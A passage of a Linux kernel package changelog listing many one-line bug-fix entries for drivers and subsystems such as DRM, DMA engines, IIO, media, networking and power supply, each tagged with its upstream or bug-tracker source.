crypto: rockchip - drop redundant crypto_skcipher_ivsize() calls (git-fixes).\n- crypto: seqiv - Do not use req-\u003eiv after crypto_aead_encrypt (git-fixes).\n- crypto: virtio - Add spinlock protection with virtqueue notification (git-fixes).\n- crypto: virtio - Remove duplicated virtqueue_kick in virtio_crypto_skcipher_crypt_req (git-fixes).\n- device property: Allow secondary lookup in fwnode_get_next_child_node() (git-fixes).\n- dm-integrity: limit MAX_TAG_SIZE to 255 (git-fixes).\n- dm-verity: fix unreliable memory allocation (git-fixes).\n- dm: fix queue start/stop imbalance under suspend/load/resume races (bsc#1253386)\n- dma: dma-axi-dmac: fix SW cyclic transfers (git-fixes).\n- dmaengine: apple-admac: Add \"apple,t8103-admac\" compatible (git-fixes).\n- dmaengine: at_hdmac: fix device leak on of_dma_xlate() (git-fixes).\n- dmaengine: bcm-sba-raid: fix device leak on probe (git-fixes).\n- dmaengine: dw: dmamux: fix OF node leak on route allocation failure (git-fixes).\n- dmaengine: idxd: fix device leaks on compat bind and unbind (git-fixes).\n- dmaengine: lpc18xx-dmamux: fix device leak on route allocation (git-fixes).\n- dmaengine: mediatek: uart-apdma: Fix above 4G addressing TX/RX (git-fixes).\n- dmaengine: omap-dma: fix dma_pool resource leak in error paths (git-fixes).\n- dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() (git-fixes).\n- dmaengine: sh: rz-dmac: Fix rz_dmac_terminate_all() (git-fixes).\n- dmaengine: sun6i: Choose appropriate burst length under maxburst (stable-fixes).\n- dmaengine: tegra-adma: Fix use-after-free (git-fixes).\n- dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation (git-fixes).\n- dmaengine: ti: dma-crossbar: fix device leak on dra7x route allocation (git-fixes).\n- dmaengine: ti: k3-udma: fix device leak on udma lookup (git-fixes).\n- dmaengine: xilinx: xdma: Fix regmap max_register (git-fixes).\n- dmaengine: xilinx_dma: Fix uninitialized addr_width when \"xlnx,addrwidth\" property is missing (git-fixes).\n- docs: ABI: sysfs-devices-soc: Fix swapped sample values (git-fixes).\n- docs: fix WARNING document not included in any toctree (stable-fixes).\n- docs: w1: fix w1-netlink invalid URL (git-fixes).\n- dpll: Prevent duplicate registrations (git-fixes).\n- dpll: fix device-id-get and pin-id-get to return errors properly (git-fixes).\n- dpll: fix return value check for kmemdup (git-fixes).\n- dpll: indent DPLL option type by a tab (git-fixes).\n- dpll: spec: add missing module-name and clock-id to pin-get reply (git-fixes).\n- drivers/usb/dwc3: fix PCI parent check (git-fixes).\n- drivers: iio: mpu3050: use dev_err_probe for regulator request (git-fixes).\n- drm/amd/display: Avoid updating surface with the same surface under MPO (stable-fixes).\n- drm/amd/display: Bump the HDMI clock to 340MHz (stable-fixes).\n- drm/amd/display: Check NULL before accessing (stable-fixes).\n- drm/amd/display: Fix DP no audio issue (stable-fixes).\n- drm/amd/display: Fix logical vs bitwise bug in get_embedded_panel_info_v2_1() (git-fixes).\n- drm/amd/display: Increase DPCD read retries (stable-fixes).\n- drm/amd/display: Move sleep into each retry for retrieve_link_cap() (stable-fixes).\n- drm/amd/display: Use GFP_ATOMIC in dc_create_plane_state() (stable-fixes).\n- drm/amd/display: Use same max plane scaling limits for all 64 bpp formats (git-fixes).\n- drm/amd/display: fix wrong color value mapping on MCM shaper LUT (git-fixes).\n- drm/amd/pm: Do not clear SI SMC table when setting power limit (git-fixes).\n- drm/amd/pm: Workaround SI powertune issue on Radeon 430 (v2) (git-fixes).\n- drm/amd/pm: fix race in power state check before mutex lock (git-fixes).\n- drm/amd: Clean up kfd node on surprise disconnect (stable-fixes).\n- drm/amd: Fix hang on amdgpu unload by using pci_dev_is_disconnected() (git-fixes).\n- drm/amdgpu/gfx10: fix wptr reset in KGQ init (stable-fixes).\n- drm/amdgpu/gfx11: fix wptr reset in KGQ init (stable-fixes).\n- drm/amdgpu/soc21: fix xclk for APUs (stable-fixes).\n- drm/amdgpu: Add HAINAN clock adjustment (stable-fixes).\n- drm/amdgpu: Adjust usleep_range in fence wait (stable-fixes).\n- drm/amdgpu: Fix memory leak in amdgpu_acpi_enumerate_xcc() (git-fixes).\n- drm/amdgpu: Fix memory leak in amdgpu_ras_init() (git-fixes).\n- drm/amdgpu: Forward VMID reservation errors (git-fixes).\n- drm/amdgpu: Skip emit de meta data on gfx11 with rs64 enabled (stable-fixes).\n- drm/amdgpu: add missing lock to amdgpu_ttm_access_memory_sdma (git-fixes).\n- drm/amdgpu: add support for HDP IP version 6.1.1 (stable-fixes).\n- drm/amdgpu: avoid a warning in timedout job handler (stable-fixes).\n- drm/amdgpu: fix NULL pointer dereference in amdgpu_gmc_filter_faults_remove (git-fixes).\n- drm/amdgpu: fix cyan_skillfish2 gpu info fw handling (git-fixes).\n- drm/amdgpu: fix sync handling in amdgpu_dma_buf_move_notify (git-fixes).\n- drm/amdgpu: update mappings not managed by KFD (bsc#1255428)\n- drm/amdkfd: Fix GART PTE for non-4K pagesize in svm_migrate_gart_map() (stable-fixes).\n- drm/amdkfd: Fix out-of-bounds write in kfd_event_page_set() (stable-fixes).\n- drm/amdkfd: Fix watch_id bounds checking in debug address watch v2 (git-fixes).\n- drm/amdkfd: fix a memory leak in device_queue_manager_init() (git-fixes).\n- drm/amdkfd: fix debug watchpoints for logical devices (stable-fixes).\n- drm/atmel-hlcdc: do not reject the commit if the src rect has fractional parts (stable-fixes).\n- drm/atmel-hlcdc: fix memory leak from the atomic_destroy_state callback (stable-fixes).\n- drm/atmel-hlcdc: fix use-after-free of drm_crtc_commit after release (stable-fixes).\n- drm/bridge: samsung-dsim: Fix memory leak in error path (git-fixes).\n- drm/bridge: ti-sn65dsi86: Enable HPD polling if IRQ is not used (git-fixes).\n- drm/buddy: Prevent BUG_ON by validating rounded allocation (git-fixes).\n- drm/display/dp_mst: Add protection against 0 vcpi (stable-fixes).\n- drm/gma500: Remove unused helper psb_fbdev_fb_setcolreg() (git-fixes).\n- drm/i915/acpi: free _DSM package when no connectors (git-fixes).\n- drm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer (git-fixes).\n- drm/i915/wakeref: clean up INTEL_WAKEREF_PUT_* flag macros (stable-fixes).\n- drm/imx/tve: fix probe device leak (git-fixes).\n- drm/logicvc: Fix device node reference leak in logicvc_drm_config_parse() (git-fixes).\n- drm/mediatek: Fix CCORR mtk_ctm_s31_32_to_s1_n function issue (git-fixes).\n- drm/mediatek: Fix device node reference leak in mtk_dp_dt_parse() (git-fixes).\n- drm/mgag200: Fix big-endian support (git-fixes).\n- drm/mgag200: fix mgag200_bmc_stop_scanout() (git-fixes).\n- drm/msm/a2xx: fix pixel shader start on A225 (git-fixes).\n- drm/msm/a2xx: stop over-complaining about the legacy firmware (git-fixes).\n- drm/msm/a6xx: Fix out of bound IO access in a6xx_get_gmu_registers (git-fixes).\n- drm/msm/a6xx: Flush LRZ cache before PT switch (git-fixes).\n- drm/msm/dpu: Add missing NULL pointer check for pingpong interface (git-fixes).\n- drm/msm/dpu: Remove dead-code in dpu_encoder_helper_reset_mixers() (git-fixes).\n- drm/msm/dpu: fix CMD panels on DPU 1.x - 3.x (git-fixes).\n- drm/nouveau/disp/nv50-: Set lock_core in curs507a_prepare (git-fixes).\n- drm/nouveau/dispnv50: Do not call drm_atomic_get_crtc_state() in prepare_fb (git-fixes).\n- drm/nouveau: add missing DCB connector types (git-fixes).\n- drm/nouveau: implement missing DCB connector types; gracefully handle unknown connectors (git-fixes).\n- drm/nouveau: restrict the flush page to a 32-bit address (git-fixes).\n- drm/panel-simple: fix connector type for DataImage SCF0700C48GGU18 panel (git-fixes).\n- drm/panel: sony-td4353-jdi: Enable prepare_prev_first (git-fixes).\n- drm/pl111: Fix error handling in pl111_amba_probe (git-fixes).\n- drm/radeon: Add HAINAN clock adjustment (stable-fixes).\n- drm/radeon: Remove __counted_by from ClockInfoArray.clockInfo[] (stable-fixes).\n- drm/radeon: delete radeon_fence_process in is_signaled, no deadlock (stable-fixes).\n- drm/tegra: dsi: fix device leak on probe (git-fixes).\n- drm/tegra: hdmi: sor: Fix error: variable \u2018j\u2019 set but not used (stable-fixes).\n- drm/tilcdc: request and mapp iomem with devres (stable-fixes).\n- drm/ttm: Avoid NULL pointer deref for evicted BOs (git-fixes).\n- drm/v3d: Set DMA segment size to avoid debug warnings (stable-fixes).\n- drm/vgem-fence: Fix potential deadlock on release (git-fixes).\n- drm/vmwgfx: Fix an error return check in vmw_compat_shader_add() (git-fixes).\n- drm/vmwgfx: Fix invalid kref_put callback in vmw_bo_dirty_release (git-fixes).\n- drm/vmwgfx: Return the correct value in vmw_translate_ptr functions (git-fixes).\n- drm/vmwgfx: Use kref in vmw_bo_dirty (stable-fixes).\n- drm: Account property blob allocations to memcg (stable-fixes).\n- drm: nouveau: Replace sprintf() with sysfs_emit() (git-fixes).\n- drm: sti: fix device leaks at component probe (git-fixes).\n- efi/libstub: Describe missing \u0027out\u0027 parameter in efi_load_initrd (git-fixes).\n- efi/libstub: Fix page table access in 5-level to 4-level paging transition (git-fixes).\n- efi: Fix reservation of unaccepted memory table (git-fixes).\n- efivarfs: fix error propagation in efivar_entry_get() (git-fixes).\n- exfat: add a check for invalid data size (git-fixes).\n- exfat: using hweight instead of internal logic (git-fixes).\n- ext4: fix iloc.bh leak in ext4_xattr_inode_update_ref (git-fixes).\n- ext4: use optimized mballoc scanning regardless of inode format (bsc#1254378).\n- ext4: wait for ongoing I/O to complete before freeing blocks (bsc#1256366).\n- fbcon: check return value of con2fb_acquire_newinfo() (git-fixes).\n- fbdev: au1200fb: Fix a memory leak in au1200fb_drv_probe() (git-fixes).\n- fbdev: ffb: fix corrupted video output on Sun FFB1 (stable-fixes).\n- fbdev: gbefb: fix to use physical address instead of dma address (stable-fixes).\n- fbdev: of: display_timing: fix refcount leak in of_get_display_timings() (git-fixes).\n- fbdev: pxafb: Fix multiple clamped values in pxafb_adjust_timing (git-fixes).\n- fbdev: rivafb: fix divide error in nv3_arb() (git-fixes).\n- fbdev: smscufx: properly copy ioctl memory to kernelspace (stable-fixes).\n- fbdev: ssd1307fb: fix potential page leak in ssd1307fb_probe() (git-fixes).\n- fbdev: tcx.c fix mem_map to correct smem_start offset (git-fixes).\n- fbdev: vt8500lcdfb: fix missing dma_free_coherent() (git-fixes).\n- firewire: nosy: Fix dma_free_coherent() size (git-fixes).\n- firmware: imx: scu-irq: Init workqueue before request mbox channel (stable-fixes).\n- firmware: imx: scu-irq: fix OF node leak in (git-fixes).\n- firmware: stratix10-svc: Add mutex in stratix10 memory management (git-fixes).\n- firmware: stratix10-svc: fix bug in saving controller data (git-fixes).\n- firmware: stratix10-svc: fix make htmldocs warning for stratix10_svc (git-fixes).\n- fix it87_wdt early reboot by reporting running timer (stable-fixes).\n- fpga: dfl: use subsys_initcall to allow built-in drivers to be added (git-fixes).\n- fpga: of-fpga-region: Fail if any bridge is missing (stable-fixes).\n- fs: dlm: allow to F_SETLKW getting interrupted (bsc#1255025).\n- genalloc.h: fix htmldocs warning (git-fixes).\n- gpio: aspeed-sgpio: Change the macro to support deferred probe (stable-fixes).\n- gpio: omap: do not register driver in probe() (git-fixes).\n- gpio: pca953x: Add support for level-triggered interrupts (stable-fixes).\n- gpio: pca953x: Utilise dev_err_probe() where it makes sense (stable-fixes).\n- gpio: pca953x: Utilise temporary variable for struct device (stable-fixes).\n- gpio: pca953x: fix wrong error probe return value (git-fixes).\n- gpio: pca953x: handle short interrupt pulses on PCAL devices (git-fixes).\n- gpio: pca953x: mask interrupts in irq shutdown (stable-fixes).\n- gpio: rockchip: Stop calling pinctrl for set_direction (git-fixes).\n- gpio: rockchip: mark the GPIO controller as sleeping (git-fixes).\n- gpio: sprd: Change sprd_gpio lock to raw_spin_lock (stable-fixes).\n- gpu: host1x: Fix race in syncpt alloc/free (git-fixes).\n- hwmon: (f71882fg) Add F81968 support (stable-fixes).\n- hwmon: (ibmpex) fix use-after-free in high/low store (git-fixes).\n- hwmon: (max16065) Use READ/WRITE_ONCE to avoid compiler optimization induced race (git-fixes).\n- hwmon: (max16065) Use local variable to avoid TOCTOU (git-fixes).\n- hwmon: (nct6775) Add ASUS Pro WS WRX90E-SAGE SE (stable-fixes).\n- hwmon: (occ) Mark occ_init_attribute() as __printf (git-fixes).\n- hwmon: (tmp401) fix overflow caused by default conversion rate value (git-fixes).\n- hwmon: (w83791d) Convert macros to functions to avoid TOCTOU (git-fixes).\n- hwmon: (w83l786ng) Convert macros to functions to avoid TOCTOU (git-fixes).\n- hwmon: sy7636a: Fix regulator_enable resource leak on error path (git-fixes).\n- i2c: amd-mp2: fix reference leak in MP2 PCI device (git-fixes).\n- i2c: designware: Disable SMBus interrupts to prevent storms from mis-configured firmware (stable-fixes).\n- i2c: i2c.h: fix a bad kernel-doc line (git-fixes).\n- i3c: Move device name assignment after i3c_bus_init (git-fixes).\n- i3c: dw: Initialize spinlock to avoid upsetting lockdep (git-fixes).\n- i3c: fix refcount inconsistency in i3c_master_register (git-fixes).\n- i3c: master: Inherit DMA masks and parameters from parent device (stable-fixes).\n- i3c: master: svc: Initialize \u0027dev\u0027 to NULL in svc_i3c_master_ibi_isr() (stable-fixes).\n- i3c: master: svc: Prevent incomplete IBI transaction (git-fixes).\n- ice: use netif_get_num_default_rss_queues() (bsc#1247712).\n- idr: fix idr_alloc() returning an ID out of range (git-fixes).\n- iio: Use IRQF_NO_THREAD (stable-fixes).\n- iio: accel: bmc150: Fix irq assumption regression (stable-fixes).\n- iio: accel: fix ADXL355 startup race condition (git-fixes).\n- iio: accel: iis328dq: fix gain values (git-fixes).\n- iio: adc: ad7280a: fix ad7280_store_balance_timer() (git-fixes).\n- iio: adc: ad7280a: handle spi_setup() errors in probe() (git-fixes).\n- iio: adc: ad9467: fix ad9434 vref mask (git-fixes).\n- iio: adc: at91-sama5d2_adc: Fix potential use-after-free in sama5d2_adc driver (git-fixes).\n- iio: adc: ti_am335x_adc: Limit step_avg to valid range for gcc complains (stable-fixes).\n- iio: core: Clean up device correctly on iio_device_alloc() failure (git-fixes).\n- iio: core: add missing mutex_destroy in iio_dev_release() (git-fixes).\n- iio: dac: ad5686: add AD5695R to ad5686_chip_info_tbl (git-fixes).\n- iio: gyro: itg3200: Fix unchecked return value in read_raw (git-fixes).\n- iio: imu: st_lsm6dsx: Fix measurement unit for odr struct member (git-fixes).\n- iio: imu: st_lsm6dsx: fix array size for st_lsm6dsx_settings fields (git-fixes).\n- iio: imu: st_lsm6dsx: fix iio_chan_spec for sensors without event detection (git-fixes).\n- iio: magnetometer: Remove IRQF_ONESHOT (stable-fixes).\n- iio: sca3000: Fix a resource leak in sca3000_probe() (git-fixes).\n- iio: st_lsm6dsx: Fixed calibrated timestamp calculation (git-fixes).\n- iio:common:ssp_sensors: Fix an error handling path ssp_probe() (git-fixes).\n- ima: Handle error code returned by ima_filter_rule_match() (git-fixes).\n- intel_th: Fix error handling in intel_th_output_open (git-fixes).\n- intel_th: fix device leak on output open() (git-fixes).\n- iomap: account for unaligned end offsets when truncating read range (git-fixes).\n- ipmi: Fix __scan_channels() failing to rescan channels (stable-fixes).\n- ipmi: Fix handling of messages with provided receive message pointer (git-fixes).\n- ipmi: Fix the race between __scan_channels() and deliver_response() (stable-fixes).\n- ipmi: Rework user message limit handling (git-fixes).\n- ipmi: ipmb: initialise event handler read bytes (git-fixes).\n- irqchip/mchp-eic: Fix error code in mchp_eic_domain_alloc() (git-fixes).\n- kABI workaround for HCI_LE_ADV_0 addition (git-fixes).\n- kconfig/mconf: Initialize the default locale at startup (stable-fixes).\n- kconfig/nconf: Initialize the default locale at startup (stable-fixes).\n- kernel-binary: Require libdw in Factory Libdw is required for gendwarfksyms\n- kernel-binary: Support building gendwarfksyms on SLE/Leap 15\n- landlock: Optimize file path walks and prepare for audit support (bsc#1255698).\n- leds: led-class: Only Add LED to leds_list when it is fully ready (git-fixes).\n- leds: leds-lp50xx: Allow LED 0 to be added to module bank (git-fixes).\n- leds: leds-lp50xx: Enable chip before any communication (git-fixes).\n- leds: leds-lp50xx: LP5009 supports 3 modules for a total of 9 LEDs (git-fixes).\n- leds: netxbig: Fix GPIO descriptor leak in error paths (git-fixes).\n- leds: qcom-lpg: Check the return value of regmap_bulk_write() (git-fixes).\n- lib/crypto: aes: Fix missing MMU protection for AES S-box (git-fixes).\n- lib/vsprintf: Check pointer before dereferencing in time_and_date() (git-fixes).\n- mISDN: annotate data-race around dev-\u003ework (git-fixes).\n- mailbox: mailbox-test: Fix debugfs_create_dir error checking (git-fixes).\n- media: TDA1997x: Remove redundant cancel_delayed_work in probe (git-fixes).\n- media: adv7180: fix frame interval in progressive mode (stable-fixes).\n- media: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status() (git-fixes).\n- media: amphion: Add a frame flush mode for decoder (stable-fixes).\n- media: amphion: Cancel message work before releasing the VPU core (git-fixes).\n- media: amphion: Clear last_buffer_dequeued flag for DEC_CMD_START (stable-fixes).\n- media: amphion: Make some vpu_v4l2 functions static (stable-fixes).\n- media: amphion: Remove vpu_vb_is_codecconfig (git-fixes).\n- media: atomisp: Prefix firmware paths with \"intel/ipu/\" (bsc#1252973).\n- media: atomisp: Remove firmware_name module parameter (bsc#1252973).\n- media: ccs: Accommodate C-PHY into the calculation (git-fixes).\n- media: ccs: Avoid possible division by zero (git-fixes).\n- media: cec: Fix debugfs leak on bus_register() failure (git-fixes).\n- media: cx23885: Add missing unmap in snd_cx23885_hw_params() (git-fixes).\n- media: cx25821: Add missing unmap in snd_cx25821_hw_params() (git-fixes).\n- media: cx25821: Fix a resource leak in cx25821_dev_setup() (stable-fixes).\n- media: cx88: Add missing unmap in snd_cx88_hw_params() (git-fixes).\n- media: dvb-core: dmxdevfilter must always flush bufs (stable-fixes).\n- media: dvb-core: fix wrong reinitialization of ringbuffer on reopen (git-fixes).\n- media: dvb-net: fix OOB access in ULE extension header tables (git-fixes).\n- media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg() (git-fixes).\n- media: i2c/tw9903: Fix potential memory leak in tw9903_probe() (git-fixes).\n- media: i2c/tw9906: Fix potential memory leak in tw9906_probe() (git-fixes).\n- media: i2c: ADV7604: Remove redundant cancel_delayed_work in probe (git-fixes).\n- media: i2c: adv7842: Remove redundant cancel_delayed_work in probe (git-fixes).\n- media: i2c: ov5647: Correct minimum VBLANK value (git-fixes).\n- media: i2c: ov5647: Correct pixel array offset (git-fixes).\n- media: i2c: ov5647: Fix PIXEL_RATE value for VGA mode (git-fixes).\n- media: i2c: ov5647: Initialize subdev before controls (git-fixes).\n- media: i2c: ov5647: Sensor should report RAW color space (git-fixes).\n- media: i2c: ov5647: use our own mutex for the ctrl lock (git-fixes).\n- media: msp3400: Avoid possible out-of-bounds array accesses in msp3400c_thread() (git-fixes).\n- media: mtk-mdp: Fix a reference leak bug in mtk_mdp_remove() (git-fixes).\n- media: mtk-mdp: Fix error handling in probe function (git-fixes).\n- media: omap3isp: isp_video_mbus_to_pix/pix_to_mbus fixes (stable-fixes).\n- media: omap3isp: isppreview: always clamp in preview_try_format() (stable-fixes).\n- media: omap3isp: set initial format (stable-fixes).\n- media: pvrusb2: Fix incorrect variable used in trace message (git-fixes).\n- media: pvrusb2: fix URB leak in pvr2_send_request_ex (stable-fixes).\n- media: qcom: camss: vfe: Fix out-of-bounds access in vfe_isr_reg_update() (git-fixes).\n- media: radio-keene: fix memory leak in error path (git-fixes).\n- media: rc: st_rc: Fix reset control resource leak (git-fixes).\n- media: renesas: rcar_drif: fix device node reference leak in rcar_drif_bond_enabled (git-fixes).\n- media: rkisp1: Fix filter mode register configuration (stable-fixes).\n- media: samsung: exynos4-is: fix potential ABBA deadlock on init (git-fixes).\n- media: solo6x10: Check for out of bounds chip_id (stable-fixes).\n- media: uvcvideo: Fix allocation for small frame sizes (git-fixes).\n- media: v4l2-mem2mem: Fix outdated documentation (git-fixes).\n- media: venus: vdec: fix error state assignment for zero bytesused (git-fixes).\n- media: verisilicon: Fix CPU stalls on G2 bus error (git-fixes).\n- media: verisilicon: Protect G2 HEVC decoder against invalid DPB index (git-fixes).\n- media: verisilicon: Store chroma and motion vectors offset (stable-fixes).\n- media: verisilicon: g2: Use common helpers to compute chroma and mv offsets (stable-fixes).\n- media: videobuf2: Fix device reference leak in vb2_dc_alloc error path (git-fixes).\n- media: vidtv: initialize local pointers upon transfer of memory ownership (git-fixes).\n- media: vpif_capture: fix section mismatch (git-fixes).\n- media: vpif_display: fix section mismatch (git-fixes).\n- mei: me: add nova lake point S DID (stable-fixes).\n- mei: me: add wildcat lake P DID (stable-fixes).\n- mfd: altera-sysmgr: Fix device leak on sysmgr regmap lookup (git-fixes).\n- mfd: arizona: Fix regulator resource leak on wm5102_clear_write_sequencer() failure (git-fixes).\n- mfd: core: Add locking around \u0027mfd_of_node_list\u0027 (git-fixes).\n- mfd: da9055: Fix missing regmap_del_irq_chip() in error path (git-fixes).\n- mfd: max77620: Fix potential IRQ chip conflict when probing two devices (git-fixes).\n- mfd: mt6358-irq: Fix missing irq_domain_remove() in error path (git-fixes).\n- mfd: mt6397-irq: Fix missing irq_domain_remove() in error path (git-fixes).\n- mfd: tps6105x: Fix kernel-doc warnings relating to the core struct and tps6105x_mode (git-fixes).\n- mfd: wm8350-core: Use IRQF_ONESHOT (git-fixes).\n- misc: bcm_vk: Fix possible null-pointer dereferences in bcm_vk_read() (stable-fixes).\n- misc: eeprom: Fix EWEN/EWDS/ERAL commands for 93xx56 and 93xx66 (stable-fixes).\n- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).\n- mmc: mmci: Fix device_node reference leak in of_get_dml_pipe_index() (git-fixes).\n- mmc: rtsx_pci_sdmmc: implement sdmmc_card_busy function (git-fixes).\n- mmc: rtsx_pci_sdmmc: increase power-on settling delay to 5ms (git-fixes).\n- mmc: sdhci-esdhc-imx: add alternate ARCH_S32 dependency to Kconfig (git-fixes).\n- mmc: sdhci-msm: Avoid early clock doubling during HS400 transition (stable-fixes).\n- mmc: sdhci-of-dwcmshc: Prevent illegal clock reduction in HS200/HS400 mode (git-fixes).\n- most: usb: fix double free on late probe failure (git-fixes).\n- mt76: mt7615: Fix memory leak in mt7615_mcu_wtbl_sta_add() (git-fixes).\n- mtd: lpddr_cmds: fix signed shifts in lpddr_cmds (git-fixes).\n- mtd: maps: pcmciamtd: fix potential memory leak in pcmciamtd_detach() (git-fixes).\n- mtd: nand: relax ECC parameter validation check (git-fixes).\n- mtd: parsers: Fix memory leak in mtd_parser_tplink_safeloader_parse() (git-fixes).\n- mtd: parsers: ofpart: fix OF node refcount leak in parse_fixed_partitions() (git-fixes).\n- mtd: rawnand: cadence: Fix return type of CDMA send-and-wait helper (git-fixes).\n- mtd: rawnand: lpc32xx_slc: fix GPIO descriptor leak on probe error and remove (git-fixes).\n- mtd: rawnand: pl353: Fix software ECC support (git-fixes).\n- mtd: rawnand: renesas: Handle devm_pm_runtime_enable() errors (git-fixes).\n- mtd: spinand: Fix kernel doc (git-fixes).\n- myri10ge: avoid uninitialized variable use (stable-fixes).\n- net: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts (git-fixes).\n- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).\n- net: mdio: aspeed: add dummy read to avoid read-after-write issue (git-fixes).\n- net: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write (git-fixes).\n- net: nfc: nci: Fix parameter validation for packet data (git-fixes).\n- net: phy: adin1100: Fix software power-down ready condition (git-fixes).\n- net: phy: mxl-gpy: fix bogus error on USXGMII and integrated PHY (git-fixes).\n- net: phy: mxl-gpy: fix link properties on USXGMII and internal PHYs (git-fixes).\n- net: rose: fix invalid array index in rose_kill_by_device() (git-fixes).\n- net: tcp: allow zero-window ACK update the window (bsc#1254767).\n- net: usb: catc: enable basic endpoint checking (git-fixes).\n- net: usb: dm9601: remove broken SR9700 support (git-fixes).\n- net: usb: kalmia: validate USB endpoints (git-fixes).\n- net: usb: kaweth: remove TX queue manipulation in kaweth_set_rx_mode (git-fixes).\n- net: usb: kaweth: validate USB endpoints (git-fixes).\n- net: usb: lan78xx: scan all MDIO addresses on LAN7801 (git-fixes).\n- net: usb: pegasus: enable basic endpoint checking (git-fixes).\n- net: usb: pegasus: fix memory leak in update_eth_regs_async() (git-fixes).\n- net: usb: r8152: fix transmit queue timeout (stable-fixes).\n- net: usb: rtl8150: fix memory leak on usb_submit_urb() failure (git-fixes).\n- net: usb: sr9700: fix incorrect command used to write single register (git-fixes).\n- net: usb: sr9700: remove code to drive nonexistent multicast filter (stable-fixes).\n- net: usb: sr9700: support devices with virtual driver CD (stable-fixes).\n- net: wan/fsl_ucc_hdlc: Fix dma_free_coherent() in uhdlc_memclean() (git-fixes).\n- net: wan: farsync: Fix use-after-free bugs caused by unfinished tasklets (git-fixes).\n- net: wwan: iosm: Fix memory leak in ipc_mux_deinit() (git-fixes).\n- net: wwan: t7xx: fix potential skb-\u003efrags overflow in RX path (git-fixes).\n- nfc: hci: shdlc: Stop timers and work before freeing context (git-fixes).\n- nfc: llcp: Fix memleak in nfc_llcp_send_ui_frame() (git-fixes).\n- nfc: nci: Fix race between rfkill and nci_unregister_device() (git-fixes).\n- nfc: nxp-nci: remove interrupt trigger type (stable-fixes).\n- nfc: pn533: Fix error code in pn533_acr122_poweron_rdr() (git-fixes).\n- nfc: pn533: properly drop the usb interface reference on disconnect (git-fixes).\n- ntb: ntb_hw_switchtec: Fix array-index-out-of-bounds access (stable-fixes).\n- ntb: ntb_hw_switchtec: Fix shift-out-of-bounds for 0 mw lut (stable-fixes).\n- nvme: Use non zero KATO for persistent discovery connections (git-fixes).\n- of: fix reference count leak in of_alias_scan() (git-fixes).\n- of: platform: Use default match table for /firmware (git-fixes).\n- orangefs: fix xattr related buffer overflow.. (git-fixes).\n- phy: broadcom: bcm63xx-usbh: fix section mismatches (git-fixes).\n- phy: freescale: imx8m-pcie: assert phy reset during power on (stable-fixes).\n- phy: fsl-imx8mq-usb: disable bind/unbind platform driver feature (stable-fixes).\n- phy: mvebu-cp110-utmi: fix dr_mode property read from dts (stable-fixes).\n- phy: renesas: rcar-gen3-usb2: Fix an error handling path in rcar_gen3_phy_usb2_probe() (git-fixes).\n- phy: rockchip: inno-usb2: fix communication disruption in gadget mode (git-fixes).\n- phy: rockchip: inno-usb2: fix disconnection in gadget mode (git-fixes).\n- phy: stm32-usphyc: Fix off by one in probe() (git-fixes).\n- phy: tegra: xusb: Explicitly configure HS_DISCON_LEVEL to 0x7 (git-fixes).\n- pinctrl: equilibrium: Fix device node reference leak in pinbank_init() (git-fixes).\n- pinctrl: meson: mark the GPIO controller as sleeping (git-fixes).\n- pinctrl: qcom: lpass-lpi: mark the GPIO controller as sleeping (git-fixes).\n- pinctrl: qcom: msm: Fix deadlock in pinmux configuration (stable-fixes).\n- pinctrl: qcom: sm8250-lpass-lpi: Fix i2s2_data_groups definition (git-fixes).\n- pinctrl: single: Fix PIN_CONFIG_BIAS_DISABLE handling (stable-fixes).\n- pinctrl: single: Fix incorrect type for error return variable (git-fixes).\n- pinctrl: single: fix refcount leak in pcs_add_gpio_func() (git-fixes).\n- pinctrl: stm32: fix hwspinlock resource leak in probe function (git-fixes).\n- platform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver (git-fixes).\n- platform/chrome: cros_ec_lightbar: Fix response size initialization (git-fixes).\n- platform/chrome: cros_typec_switch: Do not touch struct fwnode_handle::dev (git-fixes).\n- platform/mellanox: mlxbf-pmc: Remove trailing whitespaces from event names (git-fixes).\n- platform/x86/amd/pmc: Add quirk for MECHREVO Wujie 15X Pro (stable-fixes).\n- platform/x86/amd/pmc: Add spurious_8042 to Xbox Ally (stable-fixes).\n- platform/x86/amd: pmc: Add Lenovo Legion Go 2 to pmc quirk list (stable-fixes).\n- platform/x86/intel/hid: Add Dell Pro Rugged 10/12 tablet to VGBS DMI quirks (stable-fixes).\n- platform/x86: acer-wmi: Ignore backlight event (stable-fixes).\n- platform/x86: asus-wmi: use brightness_set_blocking() for kbd led (git-fixes).\n- platform/x86: classmate-laptop: Add missing NULL pointer checks (stable-fixes).\n- platform/x86: huawei-wmi: add keys for HONOR models (stable-fixes).\n- platform/x86: ibm_rtl: fix EBDA signature search pointer arithmetic (git-fixes).\n- platform/x86: intel: chtwc_int33fe: do not dereference swnode args (git-fixes).\n- platform/x86: intel: punit_ipc: fix memory corruption (git-fixes).\n- platform/x86: intel_telemetry: Fix PSS event register mask (git-fixes).\n- platform/x86: intel_telemetry: Fix swapped arrays in PSS output (git-fixes).\n- platform/x86: msi-laptop: add missing sysfs_remove_group() (git-fixes).\n- platform/x86: panasonic-laptop: Fix sysfs group leak in error path (stable-fixes).\n- platform/x86: toshiba_haps: Fix memory leaks in add/remove routines (git-fixes).\n- power: reset: nvmem-reboot-mode: respect cell size for nvmem_cell_write (git-fixes).\n- power: supply: ab8500: Fix use-after-free in power_supply_changed() (git-fixes).\n- power: supply: act8945a: Fix use-after-free in power_supply_changed() (git-fixes).\n- power: supply: apm_power: only unset own apm_get_power_status (git-fixes).\n- power: supply: bq256xx: Fix use-after-free in power_supply_changed() (git-fixes).\n- power: supply: bq25980: Fix use-after-free in power_supply_changed() (git-fixes).\n- power: supply: bq27xxx: fix wrong errno when bus ops are unsupported (git-fixes).\n- power: supply: cpcap-battery: Fix use-after-free in power_supply_changed() (git-fixes).\n- power: supply: cw2015: Check devm_delayed_work_autocancel() return code (git-fixes).\n- power: supply: goldfish: Fix use-after-free in power_supply_changed() (git-fixes).\n- power: supply: qcom_battmgr: Recognize \"LiP\" as lithium-polymer (git-fixes).\n- power: supply: rt9455: Fix use-after-free in 